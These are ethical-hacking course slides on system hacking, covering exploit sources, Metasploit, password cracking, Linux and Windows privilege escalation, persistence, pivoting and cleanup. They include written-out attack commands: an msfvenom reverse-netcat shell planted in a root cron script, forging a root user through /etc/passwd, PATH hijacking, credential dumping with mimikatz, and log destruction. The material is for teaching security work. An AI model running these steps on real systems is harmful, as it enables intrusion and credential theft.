Document Details

Uploaded by Deleted User

Djohara Benyamina

Tags

system hacking ethical hacking cybersecurity information security

Summary

This document provides an overview of system hacking techniques, including locating exploits, using Metasploit for exploitation, cracking passwords, privilege escalation and maintaining access.

Full Transcript

Ethical Hacker Course System Hacking CEHv10 Certified Ethical Hacker Exam Study Guide Edited by Djohara Benyamina Agenda EXPLOITS EXPLOITATION PASSWORD POST TOOLS CRACKING EXPLOITATION Exploits A vulnera...

Ethical Hacker Course System Hacking CEHv10 Certified Ethical Hacker Exam Study Guide Edited by Djohara Benyamina Agenda EXPLOITS EXPLOITATION PASSWORD POST TOOLS CRACKING EXPLOITATION Exploits A vulnerability is a An exploit is taking weakness in a system or advantage of that piece of software vulnerability Exploits are also not Exploits can have multiple always technical – humans outcomes – it isn’t always are vulnerable and can be shell access exploited Locating exploits Often exploits are available publicly Many repositories for exploits, including some you shouldn’t trust (anything on the Tor network) Exploit-db.org is a trustworthy repository of exploits These are often considered proof of concept (PoC), just to demonstrate a vulnerability can be exploited Local copy of the Exploit-DB can be installed on Linux systems, with search tool – Use searchsploit –m to get the exploit Locating an exploit script on Kali Locating an exploit script on Exploit-DB Search a vulnerability exploit from Exploit-DB Locate the script- choose raw {} Copy the link On Kali wget Locating an exploit script on Github Example of exploit from Github https://github.com/carlospolop/PEASS- ng/blob/master/winPEAS/winPEASbat/winPEAS.bat Click on raw Copy the URL From Kali # wget Exploitation Tools Many common exploitation tools, including Metasploit Metasploit has modules that can exploit vulnerabilities Commonly, modules target well-known vulnerabilities Modules are generally architecture and OS specific Payloads Not all payloads are Payloads are operating The payload is the part created equal, this has system and architecture of the exploit that is the to do with size (64-bit vs 32-bit) code you want run constraints on the specific payload Meterpreter provides Metasploit has a common functions that custom payload called you’d use at the OS Meterpreter level Using Metasploit Command line-oriented program is msfconsole, comes installed in Kali Linux, ParrotOS (Linux) and Commando VM (Windows) You can get a Web interface by downloading from Rapid7 Inside msfconsole, you search for modules using either their name, platform, CVE # or other identifying information Variables are set using set LVAR val When all necessary variables are set, use exploit or run Cracking passwords is a common technique that you would use after gaining access to a system John the Ripper is a common password cracking tool Cracking John supports multiple cracking methods Passwords Rainbow Tables can be much faster since the password hashes are pre-computed, but they take up enormous disk space Mimikatz is a program (and Metasploit module) that can help with password cracking and is very commonly used by attackers You need passwords before cracking, so you need to pull them from your infiltrated system Linux would commonly be /etc/shadow and /etc/passwd is useful as well Grabbing Passwords Windows uses the Security Account Manager (SAM), where passwords are stored in the registry Passwords can also be pulled from memory, which mimikatz is good at Password gathering technique on Windows networks Kerberos is authorization protocol, using client-server model Kerberoasting requires a compromised Kerberoasting account on a victim computer Used to forge credentials to gain access to another system using a ticket-granting ticket Grab passwords Escalate privileges Post Exploitation Perform reconnaissance on other systems Investigate filesystem for juicy information (like passwords written in a text file) or RSA keys Meterpreter allows you to get a screen capture of the running desktop for proof of access Privilege Escalation Escalating privileges is often necessary since most accounts will have limited permissions (principle of least privilege) Privilege escalation is obtaining administrator privileges from a non-privileged account Will typically require a local vulnerability that will result in administrator access Keep in mind that all processes run with the security context of the user that owns the process Privilege Escalation It can be Horizontal privilege escalation or Vertical privilege escalation (privilege elevation) Horizontal: User to User , Vertical: User to Admin(root) A. Linux platform – Manual Enumeration 1. Exploit a writable /etc/passwd – add a new line for a user with a hash you create and set UID, GID and shell to root - Command to create a hash for a password "openssl passwd -1 -salt [salt] [password] Privilege Escalation cont. Sudo –l :List what commands you're able to use as root on that account How to exploit these commands? see exploits on https://gtfobins.github.io/ SUID – look for file with SUID – capabilities- files to be run as root Command to display capabilities : find / -perm -u=s -type f 2>/dev/null Look for exploits on https://gtfobins.github.io/ Privilege Escalation cont. Cron table- The Cron daemon is a long-running process that executes commands at specific dates and times cat /etc/crontab to see active cron jobs Exploit the Cron table for privilege elevation Example: There is a script owned by root to be executed every 5 min named autoscript.sh Steps: Create a payload using one of the previous methods from Lab7 msfvenom -p cmd/unix/reverse_netcat lhost=KaliLIP lport=8888 echo [MSFVENOM OUTPUT] > autoscript.sh wait for cron to execute the file , and start a netcat listener using: "nc -lvnp 8888" Privilege Escalation cont. PATH variable: can be exploited to elevate privileges by imitating an executable if its absolute path is not defined. Steps: echo $PATH echo "[whatever command we want to run]" > [name of the executable we're imitating] Save it in a folder /tmp and make it executable. Add the folder to PATH with the command export PATH=/tmp:$PATH Privilege Escalation cont. Using LinEnum to run commands related to privilege escalation You can download a local copy of LinEnum using wget -raw https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh Start a Python HTTP server on Kali, default port is 8000 From the victim machine get the script from kali run the script Privilege Escalation Using LinEnum - Get a foothold in the target then try to escalate privileges - Make the script executable A segment of LinEnum’s Output Privilege Escalation cont. B. Windows platform – Manual Enumeration User Enumeration:Start by enumerating users and their privileges on the target system. Current user’s privileges: >whoami /priv List users: >net users List details of a user:> net user username Search for text files containing “password” string: >findstr /si password *.txt Mimikatz to retrieve the NTLM password hash for a domain admin Collect system info: >systeminfo | findstr /B /C:"OS Name" /C:"OS Version" Look for Open shares –SMB – use Enum4Linux Credentials hunting and abusing account privileges – Through accessing database servers and using Hydra Look for unquoted service pack and replace the legitimate application with a malicious one > wmic service list brief | findstr "Running" A scheduled task that run at predefined times with a privileged account can be modified. The schtasks command can be used to query scheduled tasks. schtasks /query /fo LIST /v Privilege Escalation cont. If Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester module to list vulnerabilities that may allow you to elevate your privileges Many tools are available online to assist with enumerating Windows systems for common and obscure privilege escalation vectors. Tool Description Seatbelt C# project for performing a wide variety of local privilege escalation checks winPEAS Script that searches for possible paths to escalate privileges on Windows hosts. PowerUp Common Windows privilege escalation vectors that rely on misconfigurations SharpUp C# version of PowerUp JAWS PowerShell script for enumerating privilege escalation vectors written in PowerShell2.0 Maintaining Access Persistence involves retaining access over time Common techniques include: Adding a scheduled job or task – See crontab Installing services or daemons Installing a backdoor or trojan Creating a new user – useradd Create RSA keys on Kali- send Public key to Autorized-users on target then can ssh with private key from Kali Pivoting Re-assess the surrounding network and systems using tools previously used for reconnaissance Identify new targets that are visible and repeat the processes used thus far Using Metasploit – autoroute to pivot to another system Pivoting example Cleanup Identify changes and evidence of exploits and penetration Remove or conceal the evidence Destroy logs, files, user accounts Exploits take advantage of weaknesses in systems or software (vulnerabilities) Database of exploits is available at exploit- db.org Metasploit is a common exploit framework Metasploit has many modules based on known Summary vulnerabilities Password cracking is a common tactic used after gaining access to a system Post exploitation activities include privilege escalation, password grabbing, internal reconnaissance, etc

Use Quizgecko on...
Browser
Browser